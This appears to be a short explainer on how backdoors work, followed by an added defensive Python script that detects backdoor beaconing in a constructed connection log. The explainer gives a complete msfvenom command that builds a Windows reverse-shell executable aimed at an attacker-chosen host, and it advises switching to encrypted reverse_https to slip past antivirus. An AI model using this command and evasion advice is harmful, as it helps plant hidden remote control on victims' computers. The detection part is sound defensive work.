In the hacking world, a backdoor is a way to control a computer remotely. An attacker tricks the victim into installing a piece of software that has a backdoor in it, and as soon as the victim installs it, the attacker can gain access to the computer and its personal data. The backdoor communicates with the attacker's IP address, listens for commands from the attacker, and executes them.
- VICTIM (listens for incoming connections)
- ATTACKER --------SEND COMMAND--------> VICTIM
- VICTIM (executes COMMAND) --------SEND OUTPUT--------> ATTACKER
Generally, for learning purposes, we can create a Windows backdoor using the msfvenom tool.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port_number> -f exe > malware.exe
Using the above command on Kali Linux, we can generate a Windows backdoor: -p selects the payload (here reverse_tcp), LHOST is the attacker's IP address, and LPORT is the port on which the attacker wants to listen. Antivirus software can detect these backdoors.
For evasion, there are many techniques an attacker can use, such as choosing reverse_https, reverse_dns, etc. instead of reverse_tcp. With reverse_https, the antivirus sees the traffic (packets) as ordinary HTTPS traffic on port 443 and takes no notice. Even if an antivirus or a firewall inspects the traffic, the packets are encrypted, and so the backdoor would go undetected.
There are many ways these backdoors can be detected, and this shows how careful one should be while using the internet.
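As an added example (not part of the original post), the script below shows one of those detection approaches for the encrypted reverse_https case. Encryption hides the payload bytes, but a backdoor that checks in with its handler produces repeated outbound connections from one process to one destination at a near-constant interval, whereas normal browsing to port 443 is bursty and spread across many hosts. The connection log, process names, addresses and thresholds are all constructed assumptions for the demonstration, not real captures.

```python
"""Beacon detection over a constructed outbound-connection log.

Added example, not code from the original post. It flags (process, destination)
pairs whose connection times recur at regular intervals, the check-in pattern
of a backdoor polling its handler, even when the traffic itself is encrypted.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample log: "timestamp_seconds process dst_ip:dst_port".
# Addresses are from the documentation ranges (TEST-NET-3 / TEST-NET-2).
SAMPLE_LOG = """\
0    browser.exe 203.0.113.10:443
3    browser.exe 203.0.113.11:443
4    browser.exe 203.0.113.12:443
60   browser.exe 203.0.113.10:443
61   browser.exe 203.0.113.10:443
300  browser.exe 203.0.113.10:443
302  browser.exe 203.0.113.10:443
0    malware.exe 198.51.100.5:443
5    malware.exe 198.51.100.5:443
11   malware.exe 198.51.100.5:443
15   malware.exe 198.51.100.5:443
21   malware.exe 198.51.100.5:443
25   malware.exe 198.51.100.5:443
"""


def parse_log(text):
    """Parse 'ts process dst' lines into (timestamp, process, dst) tuples."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, proc, dst = line.split()
        records.append((float(ts), proc, dst))
    return records


def find_beacons(records, min_connections=5, max_cv=0.25):
    """Return (process, dst) pairs that connect repeatedly at a steady period.

    cv is the coefficient of variation (stdev / mean) of the gaps between
    successive connections. A small cv means a fixed check-in interval, which
    is what a polling backdoor looks like; browsing has widely varying gaps.
    The thresholds are assumed values, not tuned against real data.
    """
    by_pair = defaultdict(list)
    for ts, proc, dst in records:
        by_pair[(proc, dst)].append(ts)

    hits = []
    for (proc, dst), times in by_pair.items():
        if len(times) < min_connections:
            continue  # too few connections to judge regularity
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        if avg == 0:
            continue  # all connections at the same instant; not a beacon
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits.append({
                "process": proc,
                "dst": dst,
                "count": len(times),
                "mean_interval": avg,
                "cv": round(cv, 3),
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"possible beacon: {hit['process']} -> {hit['dst']} "
              f"every ~{hit['mean_interval']:.1f}s (cv={hit['cv']})")
```

In the sample data, browser.exe reaches 203.0.113.10 five times but with gaps of 60, 1, 239 and 2 seconds, so it is not flagged; malware.exe checks in every 4 to 6 seconds and is reported even though its traffic looks like ordinary port 443 HTTPS. In practice the same logic can be run over firewall or proxy logs, with the interval threshold adjusted for the check-in periods being hunted.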